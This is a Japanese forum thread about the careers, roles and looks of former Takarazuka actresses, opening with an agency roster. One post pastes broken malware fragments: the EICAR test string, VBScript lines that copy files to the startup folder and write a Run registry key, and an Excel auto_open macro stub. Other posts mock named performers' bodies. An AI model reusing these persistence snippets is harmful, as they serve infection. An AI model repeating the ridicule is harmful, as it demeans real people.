アクトエンタープライズ:匠ひびき
浅井企画:南城ひかり
アトリエ・ダンカン:伊央里直加
アミューズ:蘭香レア、叶千佳、松田沙紀(咲花杏)
イデア:理絵(天乃悠華)
ウィズユー:彩輝なお、牧勢海
81プロデュース:葛城七穂
MC企画:葦笛るか
エフ・スピリット:真琴つばさ
鳳蘭事務所:鳳蘭
オスカープロモーション:紫吹淳、貴城けい、華城季帆
オフィス稲垣:黒木瞳
オフィスウォーカー:あさなぎりん(朝凪鈴)
オフィスエーツー:剣幸
オフィスかなめ:涼風真世
オフィスキクチ:平みち
officeNORU:稔幸
オレガ:高嶺ふぶき
キューブ:森奈みはる、月船さらら
クリームインターナショナル:春風ひとみ、真織由季、大鳥れい
クリームエンタテインメント:ちあきしん(千秋慎)
芸映:安奈淳
ケイダッシュ:田中里枝(千波ゆう)
劇団四季:大平敦子(千紘れいか)、有永美奈子(未宙星沙)、鳥原如未(七星きら)
研音:天海祐希
ゴールデンバード:鳴海じゅん、真灯かなた、夢輝のあ
サンミュージック:杜けあき
ジャパン・ミュージックエンタテインメント:映美くらら
ジャンクション:香坂千晶、沢樹くるみ
J.CLIP:秋園美緒
JVCエンタテインメント:汐風幸
シスカンパニー:久世星佳
姿月オフィス:姿月あさと
松竹エンタテインメント:檀れい
昭和プロダクション:華陽子
スノーホワイトオフィス:貴咲美里
スペースクラフト:森ほさち(千ほさち)
セント・フォース:山岡三子(能舞三子)
大地真央企画:大地真央
高汐巴事務所:高汐巴
宝塚クリエイティブアーツ:麻実れい、湖月わたる、朝海ひかる、星奈優里、月影瞳、愛耀子、樹里咲穂、初風緑
東宝芸能:寿美花代、一路真輝、三矢直生
西村事務所:こだま愛
ぱれっと:宮本真希(斐貴きら)
柊企画:五条まい
ビー・ナイス:海宝たまき(海宝珠起)
ファー・イースト・カンパニー:絵麻緒ゆう
藤プロダクション:妃宮玲子
フライングボックス:安寿ミラ
フラーム:紺野まひる
ブリングアップ:福麻むつ美
ブルーシャトル:日向薫
ブルーミングエージェンシー:真矢みき
フレンドシッププロモーション:大浦みずき
フロムファースト:水月舞
vocal:宮本えりか(美椰エリカ)
ホリプロ:有馬稲子、愛華みれ、香寿たつき、渚あき
町田英子事務所:榛名由梨、若葉ひろみ、紫城るい
汀事務所:汀夏子
ミズキ事務所:詩乃優花
ミネ企画:峰さを理
モナリサ:純名りさ
有限会社 オフィス・友:舞風りら
吉本興業:風花舞、仙堂花歩
WAO-enterprise:和央ようか、花總まり
前スレが990過ぎていて慌てて立てたので、所属事務所が漏れてる人がいたらスマソ
たかちゃんとコムちゃん、特にたかちゃん!
既成概念は打ち壊し、OGは何でもあり、予想外!!
とうことを教えてくれた。
>既成概念は打ち壊し、OGは何でもあり、予想外!!
>とうことを教えてくれた。
っていうか、金コネのあるOGは何でもあり!!
という事を再認識させてくれる二人だ。
それ以外はそれなりというか、一度は苦汁を飲むか脱ぐかしないと道は開けないのかな。
脱いで成功した元トップって数少ないよね
タカハナは大手事務所でもない個人事務所でよくやってる〜と思うよ。
芸能界は金以上にコネや人脈がものをいう世界だから、
あの二人にはどんな大きなコネがあるんだって感じ。
あの2人に共感するギョーカイ人は多いと思う。
ほらゲイ能界と言うくらいだから。
ハ,,ハ
('(゚∀゚∩_ おいらをどこかのスレに送って!
/ヽ 〈/\ お別れの時にはお土産を持たせてね!
/| ̄ ̄ ̄|.\/
| |/
 ̄ ̄ ̄
現在の所持品:たばこ・スーパーマリオブラザーズ・練炭・とうきびチョコ・ジアース・ブラゲ豚 ・Keron
kawaii 七輪 ブラウザゲー ブラゲスレ行きチケット(片道) うまか饅頭 ○=俺 School Days未開封
School Days開封済 うんこ インギー アーライ! kotsは神 スカイラーク全部 いちごましまろ
Muran 最強の銃 ハッピー☆マテリアル5月Ver アレテイル ヒロポン ふたなり画像.zip
★ほうちょう★ 時計仕掛けのオレンジ まわし ビール瓶 金属バット 滝川ルネッサンス
りか、マツケンのドラキュラ伝説に出るの?
来年名古屋でやるやつだよね?
テレビや出版もゲイが多いから、
二人に共感して勝手に宣伝してくれるよ、きっと。
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub
たかこは運がいいよな。
退団公演でワイルドフォーンに出会ったのが大きい。
タカコはみわあきひろ路線で行くのか?
何でたかちゃんの話は延々と続けられるんだろう。
あんまり文句言う人居ないし(別館行けとか)。
私の贔屓はここで名前が出ると、絶対叩かれて荒れるのに…
いや、たかちゃんが嫌いとかじゃなくて…何だかなぁ。
スマソ、何かつぶやきっぽくなってしまった…orz
18は理解力なしでオケ?
ここはタカコを叩くスレですよw
あんたの贔屓も叩かれたいの?
少し羨ましい仕事がくると全て金コネって・・・。
自分からゴリ押ししたんでしょ。立派に金コネだと思うけど。
わかってるとは思うけどワイルドホーンは誰にでもOKはしないよ。
貴子のことは気に入ってる。
彼女は途方もない才能を持ったスターだとインタビューで答えているじゃん。
これなくしてドラキュラの契約はありえないわけで。
かしげもゴリ押しすれば良かったね。
本物?のドラキュラがやりたいですぅ〜ってw
24番の今日が幸せになりますように!
自分が不幸せだから、そんな性格になったのだろうから。
タカコって映画も自分から持っていったんだよね。
日本じゃ内部事情はあからさまにされず「製作者側がくどきおとして」って
よく使われるけど、外国じゃあ契約に関してはシビアだからフランクさんも
そのまんま書いたんだね。「主演させてえ〜〜」って言っても誰でも
させてはもらえないけど、ここにきて貪欲なタカコがあからさまになってしまって
気の毒。
>>20みんなが羨ましがってはいないと思うけど。
淀君もフランクのミューも贔屓には合わないし。
直談判は贔屓には出来ないだろうからスゴイなとは思うよ。
映画は違うっぺ。
ワイルドホーンとはプライベートでも仲良いんで、実際は
ドラキュラやりたいなぁ
くらいだったんじゃないかな。
主演させてーが通るなら、ここの住民も含めて、1億総主演タレントになれる。
貴子はタカハナで上演可能な作品を捜してたんだよ。
自分が男でハナフサが相手でできる作品は限られる。
ワイルドホーンとは親しいからタカハナの希望が叶ったということ。
前スレでDSの話だけど一路の4万4千円はニューオオタニの均一料金です。7人同じ金額でした。
どうもワイルドホーンが急に安っぽく思えてきた
確かにMITSUKOよりは似合ってるというか、ドラキュラはピッタリって感じ。
なんやかや本人もファンも他のOGよりもずっと男役にこだわりがあるようだもの。
普通の女は似合わないし持ち味全否定しないときっと出来ない気がするし。
そういう仕事だけやって生きていける所がやっぱ凄いな。
本人が男役にこだわりがあるというより
ハナフサと組んでできる作品にこだわりがあったんじゃない?
あとタカハナは個人事務所だから全て自分達で交渉するしかない。
代わりにやってくれる人はいないからね。
大手事務所とは根本的に違う。
共演者に歌の上手い人を揃えると、主役のヘタさがわかっちゃうよね。
コムエリザと同じくらい無謀でしょう。
ミュージカルファンが観てどう思うかしら。
コムエリザはミューファンが見て色々感想も出るだろうけど、
タカコの方はタカコファンとヅカファンしか行かないじゃない?
人気者の共演者が出れば、そのファンが見るくらい?
It's so cool and the costs of musicals alone make it financial risks
so to cast a woman in a role traditional a man
(not to mention the Bram Stroker novel) becomes riskier.
それはすばらしい。ミュージカル自体が金銭的リスクのある興行なのに、
本来伝統的に男がやる役を女性が演じることは
(ドラキュラの小説は言うまでもなく)更にリスクが増すだろう・・・。
ワイルドホーンさんもちょっと心配しているみたいだし、
渋々承諾したというのがわかるね。
でも、金銭的なことはハナちゃんや熱いファンがいるから0Kなんだろうな。
男役にこだわりがある、といいながら時代劇映画で女優。
話題になりたいだけなんだとおもう。筋が通ってないところが
ファンにとっては魅力なんだろうが、あれこれ手がけてどうなんだ?
ドラキュラやるときって何歳なんだ?
タカハナファン頑張って支えて下さい。
事務所が個人だから、失敗すればダイレクトに響くだろうし、ファンも気が
抜けないね。ヅカの延長みたいなファン生活だな。
タカコ本人は「男も女も、自分にできる役ならやる」って言ってんだからいいんじゃね?
男だけやってたら「いつまでたっても男役もどきしかできない」って言って
女もやったら「筋が通らない」って言う、どうせ観ても文句しか言わない人の目を気にするより、
「男も女も見たいわ」っつー金出してくれるファンと、何よりハナフサに受ければいいんだろうし。
ルドルフのが面白そうだが。
いいじゃん、いいじゃん
もう何があっても驚かないから〜〜
OGが色々な作品で活躍してくれるのってある意味楽しいじゃない!
宝塚本体が、なんちゃってトップみたいな者ばかりになっちゃって、
面白味が最近欠けてるから、
OGが頑張ってくれてるのって嬉しいよ〜〜
単体でどっちも売り出したほうが事務所の収益的にはいいと思うけどなあ。
CSのOG情報の杜さんのコメント。
後ろのポスターが無いと、杜さん主演の公演に浜さんが出るみたいに
受け取れる。
気の強い人だね。
>42
本当に。現役のジェンヌに魅力(生徒に罪はない)がなく、OGの活躍のほうが面白い。
宝塚歌劇団がつまらないものになってきてしまったのだろうね。
ルドルフもドラキュラも男が主人公で宝塚向きだろうに、先越されてやんの。
宝塚歌劇団がつまらないでは困るだろう
劇団あってこそのOGはいっぱいいるのに
ルドルフは宝塚ですでに同テーマのうたかたがあるし、
去年ネバー書下ろしで、紅はこべも宝塚でやるって決まってるのに、
ドラキュラまで宝塚・・・ってことはないだろ、どっちみち。
劇団自体がOGに力入れてんだから宝塚は自業自得だよ。
プロダクションまで作ったら後には引けない。
現役のマイナス分をOGで補填するつもりなんでしょ。
リカがマツケンドラキュラヒロインってまじ?
興味ないし。
マツケンドラキュラって力が抜ける…ミュージカルだったら尚更。
どこの劇場でやるの?
フィナーレナンバーはサンバだよね。
死ぬまで劇団に搾取され続けるんだね。
おめでとうございます。
タカコドラキュラって、またロンゲの鬘かぶって
燕尾に黒マント、んで首チュー?
かしげのドラキュラ見て、こういうのは宝塚の中でやってくれよ…
と思った人がたくさんいたんじゃなかったのか…
かしげのやつは男役かしげが女形さんに首チューである意味面白かったw
>>53 ドラキュラって映画とかマンガとかでリーゼントのイメージ
なんだけど、タカちゃんはロン毛で行くのかしら?
かしちゃんのは見てないけど、ロン毛でした?
どこかに画像見れるところあるかな?
>55
オスカーランドで検索>かしげのファンクラブのページ>newsでどうぞ。
確かに外で見たくなかった(宝塚の衣装部はすごいとあらためて思った)。
でも54の言うとおり、男役と女形が絡むのは面白かった。女形がバク転してから
いきなりなよなよしてたしw
>>57 それはヅカでほんとにチューしてるのか?と聞くのと同じ事だと思う。
マツケンどさ芝居と、ブロードウェイミュージカルを
ふつう同列には考ないけどね。w
ここの住人は異常な感性をしていらっしゃるようだ。
前スレではかしげのドラキュラとも比べてたよー。
興味を引く題材ではあるけどね。
入り浸ってるタカコファンが文句つけてるゾw
高尚なタカコドラキュラを語りたけりゃ別館へ(・∀・)カエレ!
ここで語ってる分には、かしげもタカコもリカも大してかわらん。
またか。w
タカコアンチは3つしか返しを知らんのか?
>タカコドラキュラは2005年にNYで上演してコケた作品。
>(演出最低最悪と言われたが、出演者に救われ半年続いた)
>2007年、演出をまるまる変えてヨーロッパで上演。好評らしい。
たしかエリザベートもアメリカでは大コケ、
ヨロパで大ウケしたんじゃなかったっけ。
>>56タンありがとう。
ロン毛に燕尾にマントなんで一瞬ヅカ舞台に見えますね。
呟いてみる
60さんは煽りだお・・・
67 :
名無しさん@花束いっぱい。:2007/10/04(木) 16:57:14 ID:op6Is5/q
松平健って相手役に回って来ないで欲しい男優NO1だわ。
68 :
名無しさん@花束いっぱい。:2007/10/04(木) 17:02:01 ID:E8gGto+Y
みどりがよくマツケンの芝居に出てるよね。
69 :
名無しさん@花束いっぱい。:2007/10/04(木) 17:02:50 ID:j1UnIEuB
ドラキュラ物続くね。
りかさん出演が本当なら、初めてのドレスもの?
>>64 適当すぎ・・・アメリカでエリザベートなんて上演して無いだろ。
やっても無いもの、大コケできん。
マツケンドラキュラはいつやるの?来年?
ID:ORCT0Ncb はタカコ信者で、
朝から張り付いてるんだな。スゲー。
ヨーロッパで根強いファンがいるダンスオブバンパイアもアメリカで大コケしたんだから別にBWでヒットしない=駄作というのは言い過ぎ。
余談だけど、エリザベートもBW入りしてたら確実にコケていたと思うよ。
儲って、周りのヅカファンから嫌われまくってるのに
それでもここのスレに宣伝に来るんだよな。
教祖貴子様のことを折伏したくて?
自分たちの行いが悪くてその結果、貴子の舞台も敬遠されてるというのにね。
76 :
名無しさん@花束いっぱい。:2007/10/04(木) 18:22:33 ID:jqwzGs5g
ここはOGについて語るスレ。
気に入らなければスルーすればいいだけ。
75には贔屓にしてる人はいないのか。
マンセー話はファンサイトでやれってことだろ。
ワイルドホーンとタカコが仲良くて、なんてあきれる話はファンしか書き込まない。
そんなどうでもいいことは別館かどっかいって盛り上がってくれ。
現役のときは最新情報スレでタカコマンセー
OGになったらOGスレでタカコマンセー
スレの空気読まずに占拠するのはちっとも変わってないな。
いや、変わってないのは過剰反応するアンチだろ。
よく読んでみ、アンチの書き込みのが多いから。w
儲でなくともタカコアンチのここの占拠にうんざり。
嫌われてるのは、儲より君達だよ。
>ワイルドホーンとタカコが仲良くて、なんてあきれる話はファンしか書き込まない。
自分はおかげでなんでタカコがドラキュラなのか納得したので、
情報としては別に良いんでないかのぉ
79さんにマルッと同意。
ここはOGジェンヌの今をマターリ語るスレ。
アンチやりたきゃ他へどぞー
自分も
>>79に丸ごと同意。
たかこアンチは相変わらず攻撃的。
よほど性格が悪いのか・・ストレスの塊なのか・・
>>79 たかこアンチの占領にうんざりなら刺激するようなこと書くな
煽ってるだけなのに気づけ
このスレに限って言えば、
タカコファンが占領してるよ、明らかにw
何言ってんの
占領してんのはかしげファンでね?w
イコールたかこアンチw
かしげと言えば明日初日じゃね?ジャニ舞台。
男役から今度こそ卒業して、初女役やのー。
>>86 その初女役が脇役のしかも母親役なんだよねぇ・・・
かわいそうに。
名古屋・御園座の松平公演は、毎年5月だよね。
来年の5月もあると思うよ。
今年、海老蔵がコクーンで「ドラクル」を演って、見たら
超満員になっててカッコ良かったから、健さんも一丁やってみようか
となったのであろう。
紫吹が出るかどうかは知らないが。
>>87 そういう書き方が品が無くイヤらしいつうの
主役や大舞台でなければ、そりゃ扱いの格は下がるわさ
だからといって、芸の格が下がるわけではない
松平健のドラキュラは5月か6月頃に発表されてたよ?
確か来年の4月だったと思う。
かなーり微妙な扮装姿も出てた。
大劇場の企画は2年位前に決めるよ。
9月の海老様のをみて、5月の企画決定はありえない。
健さんが洋物やるのなら数年前から立ち上げてタイミング
図ってるはず。
タカコのだって再来年の話だからね。
>>89 あら。気分害しちゃったみたいでごめんなさい。
退団後初めての女役なのに母親役って?!って思わなかった?
愛したり愛されたりとかもなし。
次に期待ですな。
御園座って確か毎年4月は歌舞伎公演ですよ。
今年も4月は歌舞伎だった。「盟(かみかけて)三五大切」他をやっていた。
三津五郎、橋之助、菊之助が主演。
来年も4月は歌舞伎でしょう。
今年の5月18日〜6月17日までは松平健の「暴れん坊将軍スペシャル」と
2部は「歌う絵草紙」でした。来年もその頃でしょう。
松平公演は、1列目〜5列目迄は特別席で¥16800円
6列目以降は1等席で¥14800円でした。
3階は¥4500円です。来年も同じ金額でしょう。
2部でりかちゃんが歌ったり踊ったりするのかな。
以前、松平健公演を見た時には杜けあきさんが出ていて
1部の芝居も出ますが、2部のショーにも沢山出ていましたから。
松健は真央様との出会い「王様」のはげが一番似合うよ。弁慶もそうだったし。
ロンゲ健なんて、別人だわ。健のおばさまファンしか見ないだろう。
96 :
名無しさん@花束いっぱい。:2007/10/04(木) 22:40:18 ID:J4A1U3Q+
今、とんねるずに出てる、森田まりこさんは元宝塚?
受験のマネしててウケルW
魔王さまと共演の後は元旦那との共演か・・・リカさん気い使って大変だね。
でもそのソースはどこから?
上の記事ではまだ共演者は未定だったけど。
カシゲちゃんのドラキュラといいオスカーの舞台趣味って変わってるのかな。
松健の「王様」って鳳様との共演だったのね。byスポ報知
真央様と松健の出会いはどのように?
マイフェアレディーじゃなかったっけ?
風共でしょ
あ、じゃあ再会してお付き合いを始めたのがマイフェアかな・・・。
タカコの仕事情報聞くに付け、最近退団のOGは恵まれてるなあと感じる
男キャラのマミなんか、惜しかったな
退団後しばらくは自分の方向性を模索していた感があったが
最近の退団だったら、即十分男キャラとして舞台でも仕事の場があったと思う
タカコに限らずコムワタカシゲ皆、ミューが以前よりも一般的になって
いろいろなジャンル、いろいろな個性が受け入れられて、
それぞれに仕事があって話題にしてもらえて幸せだ
良い時代に卒業できて芸能人になれてよかったね
先輩OGの苦労を無駄にするなよ
今は男の俳優の女形も普通に受け入れられているからね。
篠井さんなんかも洋物の女に扮して女優で主演。
美輪様の功績大なんだろうけれど。
大女優ケイト・ブランシェットは映画でオムニバスみたいだけれど
男のボブ・ディラン役を演じている。
女優の男役は本筋ではないけれど、作品によっては在りだということは
わたる・こむのこの秋の仕事で証明された。
男役を際物としてでなく演じることが可能な時代にはなってきたね。
マツケンの相手役ってリカじゃなくて、オサなんじゃない。<ドラキュラ
そろそろ退団後の仕事が決まっていい頃だし、役どころも
リカより似合いそうだし。
102、まるっと同意。
そういえばマミとタカコは若干だけどキャラがかぶる部分がある。
マミも今の時代ならまた違ったかたちで思うところの仕事をしたかもしれないね。
でも今のマミも足場が固まってきたような仕事ぶりだし、これからもガンガレ。
どのOGにもそれぞれの個性を生かせる居場所があることを願うよ。
そしてタカコのドラキュラが実現するとして
本当にお花がその舞台に出演するのか・・個人的にはそこが一番楽しみでもある。
タカコ、お花出演を期待してっからガンガレ。
でも2年後の2009年にはタカコは41才、お花は36才だよ・・・orz
>>103 わたる、コムを見てると男役をやることが普通に受け入れられている気がする。
これからも時々、演じて欲しい。
せっかく10年以上も男役を演じてきたのにそれをゼロにするのは勿体ないしね。
>>104 オサはやっぱり芸能界に入るのかな。
TCA所属になりそうな気がする。
マミヲタですけど。
宝塚まがいの男役は状況が違っても有り得ないわ
かといって足場固まってきたなんて、それもとんでもないわ
ワタコムは単なる短期の公演(イベント)の男役でしょ。
ターコさんやヤンさんは、ハムレットを何度もやってるし
リカだって退団1作目は男役。
たまたま今年はカシゲ、ワタル、コムと男役が続いただけで
今までだって、退団後男役をやってるOGは沢山いる。
篠井さんだって、何年女役やってると思うの?
マミ、タカコは男役にしがみついてるかんじがなー
この2人は素でオナベっぽいし。
なんか、ヅカが変な目で見られるから退団してまで男役はやめてほしい。
ヤンさんはハムレット以外にもモンテクリスト伯とか男役やってるよね。
リカはどっちもやると宣言して毎年男役やってるし
これからそういうOGがさらに増えそう。
自分は良いと思うからワタル、コム、タカコみんな頑張って極めて欲しい。
タカコはいまだにモデルのような外観だからそれほどヤバくはない。
マミは…マミなりの味がある。
2人とも男役じゃない女優業してるんだから、恥ずかしいことなどない。
玉三郎の女形、ターコさんの男役で泉鏡花物(夜叉ではない)が企画されたこともある
(企画が流れてサド公爵夫人になったけれど・・ターコ女優・玉さんの洋物女装で)
>>92 まだ男役風の低い声だし、20歳そこそこの男の子と恋愛物は無理だと思う。
身長も合わないし。ちょうどよい美味しいキャストだと思ったな〜。
映像で21,2の子の母親は無理だろうけど舞台ならありなんじゃない?
>>107 テレビでかなりよく見かけるから、端から見るとマミさんはマミさんなりに
足場が固まってきてると思ってた。。
傍観者とヲタでは見方が違って当たり前
テレビなんて水物だもん
マミさんはおなべ風味っていうより
気風のいいお姐さんキャラが合ってるし、そういう方向でいくのかな
って気もする。
タカコの真性ナベ気質に比べると
ずっと女っぽく見えるんだけど…漏れだけかしら…
たかこは茶々姫だぞー
男役は再来年の話。
>101 マイフェアは関係ない。
男役はやめてもかっこいいと思うがね。男役10年だけあってまみやタカコに違和感ないがね。
>>111 >タカコはいまだにモデルのような外観だから
タカコさんってそんなにスタイル良かったっけ?
モデルのようなって言うのは花ちゃんのようなスタイルじゃ?
OGが色々な分野で、宝塚で培って来たものを生かして
活躍してくれていることは、宝塚ファンとしては嬉しいことですよ〜
自分の贔屓だけを熱狂的に応援して、他のOGを叩き回るアンチもいますが
私のように、曾祖母、祖母、母、と4代続いて、宝塚歌劇団を見続けている者からしたら
小さいころから見ていた生徒さんが、宝塚で活躍し卒業して
外の世界でも頑張っているのを見ると、親戚の子が頑張っているようで
愛しくてつい見に行ってあげたくなるのです
ちょっとびっくりしたけれどコムちゃんのシシイも
タカちゃんの茶々も、カシちゃんの母親役も
みんな見に行ってあげたいと思います
最近は皆さんがどんどん、ドラマ・映画・舞台に出られるので
さすがに全ては見に行けませんが
取りあえずカシちゃんの舞台、ユリちゃんの映画に行ってきます
タカコは他OGよりはスタイル良い方ではないけど、遠目でポーズ付けてる
のが一番綺麗。動くとイマイチ。そういう意味ではモデル風だと思う。
カシゲもそう。
>>123 そんなに好きなのかい?
フォトジェニックっていう言葉があるけどタカコやカシゲはまさにそう。
八頭身は特だね。
>>124 かしげのどこが8頭身?嘘は駄目だよ。
かしげは身長の割りに顔でかいし、足が短い。
タカコのように小顔でないから8頭身のわけがない。
タカコにしても小顔のおかげでパッと見で8頭身だけど、実は足が短い。
小顔で足が長い正真正銘の8頭身は、リカやお花のような人。
りか?
顔ばんばんで、8頭身なんかないし。
さえこと並んでさえ、顔大きいし背も低い。
足は長いけどね。
小顔とは思わないけど大顔とも思わない
ごくごく普通サイズ>カシゲタン
黙ってポーズを取ってるだけならスタイル良いと思う>タカカシ
ダルマ着たら・・・・だとは思うけど。
モデル風って言うならタカコさんかな。小顔で華奢で長身。
オナベではないな。話し方もサバサバしているか女の子かのどちらかだ。
花ちゃんはモデルにしては身長が低いと思うし、あの脚長・小顔はバービー体型だと思う。
マミさんはオナベではなくオネエ系だと思う。話し方も。
マミさんは現役の時から話が上手だしTCAのトークの仕切りも上手かったし、
樹里さんみたいにスカステでジェンヌとのトーク番組を持てば面白いと思う。
マミさんは話す相手のキャラ付けが上手くて、樹里さんのトークとは別の面白さがある。
あの理事すら愛すべきキャラになるし。もしくは組のプロデューサーになるとか。
生徒の個性を引き出すのが上手そう。
たかことカシゲ
実際の身長差はかなりある
>>128一見華奢に見えるけど、脱いだらゴツかったのがコンでバレちゃったw
ウエストはくびれてないし、足はたくましい。
着やせするのね。スカートはキツイだろうから、茶々の着物は正解なのかもね。
ちちんぷいぷいにたかこさんが出ます。
どんな様子か教えて下さい。見れないので。
できる方いらっしゃったらつべかニコにあげて下さい。
それが人にものを頼む態度か?
変な翻訳ソフトよりはマシだと思うんで貼っとく。
和央ようかという女性がいますが、彼女は宝塚のNever Say Goodbyeに主演したスターです。
彼女は美しく、長身で、非常に才能のある日本人のスターです。
彼女は今は宝塚を退職し、次にやろうと考えてるのが「(ミュージカルの)ドラキュラ」であり
・・・彼女がドラキュラをやることです。
*日本の歴史のごとく日本の女優も魅力はありますが、今、女性のドラキュラですか?
まさしくそうです。この夏私がジキルのために日本にいた間、彼女がこの話を持って来ました。
私は、わからないと言ったのですが、彼女は私を説得しました。
そして、私達がこの夏、ドラキュラの再演をヨーロッパでしていた時、
彼女が彼女のプロデューサーらと一緒に来て、私たちはその契約を交わし、
2009年の春にタイトルロールを女性が演じるというドラキュラが日本で開幕することになりました。
非常に素晴らしいことと私は思います。
ミュージカルを上演する為のコストは、そのものが金銭的な賭けとなりますが、
(ブラム・ストーカーの小説以外でも)伝統的に男性が演じていた役を
女性が演じるというのは大変な冒険です。
寸胴短足タカコw
足もごわごわ。
リカやわたると大違い。
ぷいぷいのタカコ、豚丼を皆で食べて、ポン菓子をギャラリーに配ってたぞ。
>>134 >リカやわたると大違い。
仕事っぷりから考えても大違いだっぺ。
なんか前髪うざかったぞw
あの頬、身体に比べて、肉がつきすぎで、別人かと思った。
和央さん。
うそ〜〜!私は痩せすぎが心配なくらいだったよ。
身体はともかく顔も以前より痩せたように思った。
撮影とかキツくて太る暇ないのかもね。
豚丼の食べ方が少しお下品だった。
退団した途端、丸々する人が多いのにねー
たかこさん痩せた?
顔ももうちょいふっくらしたほうがいいよ。
飛沫淳さんと湖月わたるさんは何か顔が惜しいよね。
スタイルは良いのに残念って思う。
真矢みきエロいよ。
飛沫・・・w
タカちゃん、目の下からほおにかけてたるみがあるし、
首の皺も目立って、おばさんシンガーだったよ。
まぶたもちょっと腫れてた?
テレビは向いてないかもね。
OGでテレビ向きの人って中々いないねー
かしげやワタルはそれなりに映ってたと思うけどね。
タカコは吃驚した。容色が衰えたなーって感じ。
実年齢の差だろうか。魔王様とかはすごいけど。
金閣寺音舞台で歌ってるのがアップになったんだけど、
ものすごく老けて見えて目が点。
私も見てたけど、それは言い過ぎじゃないの?
また誰かと比べると問題だから黙っておくけど。
完全にアンチ視点だねW
タカコって本当にテレビ映り悪いんだなって今回思ったよ。
前のもぷいぷいだったっけ?ひどかったし
実際見たら、綺麗だと思うんだけどなあ。
べつにいつものタカコだったよ?
もともと顔だちが美形ってわけじゃないし。
在団中といわれても、ああそうですか?みたいな。
しかし、お姫様の撮影してるようにはとうてい見えなかったね。
やっぱオナベホストキャラだ。(自分はアンチではないぞ)
飛沫の字違ってた?すまそ。
CSとか見てないの?舞台メークでも炎なんかマジやばかったよ、タカコは。
頬がたるんでて口角さがってて。首も皺が深くて。あれでも目はお直ししてるんだよね。
口元も直さないと映画はダメでしょ。
いつもの在団中のタカコだった。
タカコアンチは全力で罵ることに命かけてるから
話は半分以下にして丁度いいとオモ。
>>149 自分もお姫様やってるようには見えなかった…
スクリーンでアップになるのはちょっと厳し(ry
比較的最近のOGの中で一番ヤバイのはリカだよ。
顔パンパン。あれはテレビには出ちゃダメ。
ワタルも太ってるからかなりヤバイ。
二人とも二重アゴ。
映画はテレビと違って照明たくさん当てて
綺麗に撮ってくれるから大丈夫。
新スレになっても、相変わらずたかこスレだなここ。w
ホント、変わらないね。毎日たかこの話題ばっか。
昨日もそんなこと言ってなかった?
りか ぶん やばすぎ
良くも悪くも話題の尽きない人なんだよ
12.8% 21:42-23:28 NTV 検事・霞夕子SP 豪華客船殺人クルージング
タカコばっかだけど、一応同番組には天海も出てたんだがなw
そういや同い年なんじゃね?40歳
上のほうで最近のOGは恵まれているとあったけどホントにそう思う。
昔は退団したら女に転身するのが当たり前だった。
男役で人気があればあるほど退団後は苦戦したものだ。悩み苦しんだ人も多いと思う。
女優やりながら男役も続けるなんて考えられない。いい時代になったね。
ファンの人は幸せだよ。
>>162 > 上のほうで最近のOGは恵まれているとあったけどホントにそう思う。
> 男役で人気があればあるほど退団後は苦戦したものだ。悩み苦しんだ人も多いと思う。
例えば誰?
>>163 検事とかマダムとかスッチーの役をやっている人とか
教師とかニュースキャスターとかやった人とか。
演技として女優が男を演じるのは昔からある。
様式美としての宝塚の男役とは別物だ。
だから宝塚で築き上げたものが、そのまま通用するわけではない。
昔のOGさんはみんな苦労してるよ。
特に男役の女優転身は難しいと言われ続けてきた。
ターコさんだって退団数年は順調とは言えなかったし
真央くらいじゃないの?
167 :
名無しさん@花束いっぱい。:2007/10/05(金) 21:18:02 ID:Fp/HZcz/
忘れてない?
ブンはパンパンじゃなくてぶよぶよ
おまけにCDのジャケットなんてしわしわ
彼氏とデブデブコンビでもやるつもりか?
なんとかしてくれ〜
ふっくらしてるけど美人さんであることには変わりない。
>>165同意。
カシゲのドラキュラなんかは、ヅカの延長線上だから評判
よくなかったんじゃないかな?
同じにやってもヅカ以上には出来ないよね。
また、タカコアンチは救いようがないな。
性懲りもなくやってるよ。
たかこアンチはここに吊るしたくてわざわざ番組まで見て写真まで撮ってるの?
ご苦労ですね。
最近退団したOGが恵まれているのは時代もそうだけど
ファンの思考が変化したのも大きいよ。
最近のファン宝塚ファンというよりは生徒個人のファンになる。
昔は宝塚に比重が大きいから、退団して男役を辞めたら、ガタッと減ったもんだよ。
タカコアンチの特徴は、異常に粘着なとこ。
とっくに話題が変わってるのに、一人で蒸し返す。
だからタカコの話題が続く。
本当にウザイ。迷惑!
アンチの書き込み1に対して、ファンが4くらい書いてるように見えるがなw
>同じにやってもヅカ以上には出来ないよね。
退団後一作めだったしね、カシドラ。
外でまんまやったらやっぱライトも衣装も周りも違うしでどうしてもなんちゃって
宝塚になってしまうと思う。
それを越えて、演技者として男をやれるようになったら凄いものが出来上がる
んじゃないかな。
そういう意味では男臭さがあったり、長くトップを演った人達が一度完全な女に
戻ってあらためて男を作り上げていく工程をこれからはもっと見れるのかもしれない
と楽しみ。
宝塚的な雰囲気とか男役がボーダレスになってるのかな?>173
確かに自分も今のご贔屓を離れる必要なしというか、不満も物足りなさもないし
宝塚に戻るのは老後でもいいかな〜〜って感じ。
>>154 残念ながらわたるは痩せて顔が三角になってたよ。
たかこアンチはほとんどストーカーだよね。
普通嫌いな人の番組なんか見ないよw
>>173 たしかに生徒個人のファンになるは当たっているかもしれませんね。
たかこさんなんてその最たるジェンヌでしょうか
昨年退団した、タカコワタコムカシみんなそんな感じがする
たかこのこと書きたいが為に、他のOGの名前引き合いに出すのやめろ。
姑息すぎ。
ファン気質は確かに変化してるよね。
宝塚という団体のファンからスター個人のファンへ
しかも時代は男役も受け付ける。
>176
かしげ、コムはどちらかといえば延長線の男役って感じだね。
サエコ、ワタルは男役から360度真逆の女性を演じてからの男役。
